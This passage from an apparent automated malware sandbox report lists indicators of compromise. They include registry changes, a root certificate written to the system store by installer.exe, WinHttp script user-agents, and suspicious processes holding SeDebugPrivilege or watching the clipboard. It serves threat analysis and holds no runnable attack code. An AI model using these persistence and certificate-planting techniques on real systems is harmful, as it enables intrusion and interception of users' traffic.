Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Toolbar	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000"	OneDrive.exe

Modifies data under HKEY_USERS 19 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	svchost.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\Interface\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f}\TypeLib	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\CLSID\{2e7c0a19-0438-41e9-81e3-3ad3d64f55ba}\TypeLib	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07}\ = "IOneDriveInfoProvider"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\TypeLib\{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}\1.0\FLAGS	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\TypeLib\{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}\1.0\FLAGS\ = "0"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\TypeLib\Version = "1.0"	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\Interface\{50487D09-FFA9-45E1-8DF5-D457F646CD83}\TypeLib	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\FileSyncClient.FileSyncClient\CLSID	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileSyncShell.dll"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\ProgID	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe"	OneDrive.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\Total\ = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TypeLib	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\ = "SyncingOverlayHandler2 Class"	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\TypeLib\{082D3FEC-D0D0-4DF6-A988-053FECE7B884}\1.0	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TypeLib\Version = "1.0"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\TypeLib	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\ProxyStubClsid32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\AppID\OneDrive.EXE\AppID = "{EEABD3A3-784D-4334-AAFC-BB13234F17CF}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\CLSID\{A3CA1CF4-5F3E-4AC0-91B9-0D3716E1EAC3}\TypeLib	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182}\TypeLib\ = "{C9F3F6BB-3172-4CD8-9EB7-37C9BE601C87}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\OOBERequestHandler.OOBERequestHandler	OneDriveSetup.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\Interface\{6A821279-AB49-48F8-9A27-F6C59B4FF024}\ = "IOneDriveInfoProvider"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\odopen	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\SyncEngineFileInfoProvider.SyncEngineFileInfoProvider.1\CLSID\ = "{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\ProgID\ = "SyncEngineFileInfoProvider.SyncEngineFileInfoProvider.1"	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_CLASSES\WOW6432NODE\INTERFACE\{B5C25645-7426-433F-8A5F-42B7FF27A7B2}\TYPELIB	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_CLASSES\INTERFACE\{2387C6BD-9A36-41A2-88ED-FF731E529384}\PROXYSTUBCLSID32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\ = "ISyncEngineCOMServer"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\OOBERequestHandler.OOBERequestHandler.1\CLSID	OneDrive.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\propapps.info\Total = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_CLASSES\SYNCENGINESTORAGEPROVIDERHANDLERPROXY.SYNCENGINESTORAGEPROVIDERHANDLERPROXY.1\CLSID	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\TypeLib\{C9F3F6BB-3172-4CD8-9EB7-37C9BE601C87}\1.0\ = "FileSyncShell 1.0 Type Library"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\TypeLib\{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}\1.0\0	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\CLSID\{A3CA1CF4-5F3E-4AC0-91B9-0D3716E1EAC3}\LocalServer32	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DefaultIcon	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\ = "ILoginCallback"	OneDrive.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\totaltopposts.com\Total = "942"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Interface\{9E1CD0DF-72E7-4284-9598-342C0A46F96B}\ProxyStubClsid32	OneDrive.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	12	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	70	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	163	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: AddClipboardFormatListener 3 IoCs

pid	Process
3016	Process not Found
4756	OneDrive.exe
7004	OneDrive.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1292	powershell.exe
1292	powershell.exe
1292	powershell.exe
1544	Fri15af75ee9b.exe
1544	Fri15af75ee9b.exe
1292	powershell.exe
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
2096	rundll32.exe
2096	rundll32.exe
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3756	WerFault.exe
3756	WerFault.exe
3756	WerFault.exe
3756	WerFault.exe
3756	WerFault.exe
3756	WerFault.exe
3756	WerFault.exe
3756	WerFault.exe
3756	WerFault.exe
3756	WerFault.exe
3756	WerFault.exe
3756	WerFault.exe
3756	WerFault.exe
3756	WerFault.exe
3756	WerFault.exe
3756	WerFault.exe
3756	WerFault.exe
3756	WerFault.exe
3756	WerFault.exe
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3756	WerFault.exe
3756	WerFault.exe
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
668	svchost.exe
668	svchost.exe
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3016	Process not Found

Suspicious behavior: MapViewOfSection 24 IoCs

pid	Process
1544	Fri15af75ee9b.exe
6972	MicrosoftEdgeCP.exe
6972	MicrosoftEdgeCP.exe
3456	cfsafjc
3904	MicrosoftEdgeCP.exe
3904	MicrosoftEdgeCP.exe
3904	MicrosoftEdgeCP.exe
3904	MicrosoftEdgeCP.exe
3904	MicrosoftEdgeCP.exe
3904	MicrosoftEdgeCP.exe
1128	MicrosoftEdgeCP.exe
1128	MicrosoftEdgeCP.exe
6736	MicrosoftEdgeCP.exe
6736	MicrosoftEdgeCP.exe
4728	cfsafjc
6736	MicrosoftEdgeCP.exe
6736	MicrosoftEdgeCP.exe
6736	MicrosoftEdgeCP.exe
6736	MicrosoftEdgeCP.exe
5592	cfsafjc
6736	MicrosoftEdgeCP.exe
6736	MicrosoftEdgeCP.exe
6736	MicrosoftEdgeCP.exe
6736	MicrosoftEdgeCP.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
4788	3224221.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	744	Fri1553f0ee90.exe
Token: SeDebugPrivilege	2344	Fri155442fc38b.exe
Token: SeDebugPrivilege	3496	7217204.exe
Token: SeDebugPrivilege	1292	powershell.exe
Token: SeDebugPrivilege	4256	2.exe
Token: SeDebugPrivilege	4184	PublicDwlBrowser1100.exe
Token: SeDebugPrivilege	4560	8648482.exe
Token: SeShutdownPrivilege	3016	Process not Found
Token: SeCreatePagefilePrivilege	3016	Process not Found
Token: SeDebugPrivilege	3756	WerFault.exe
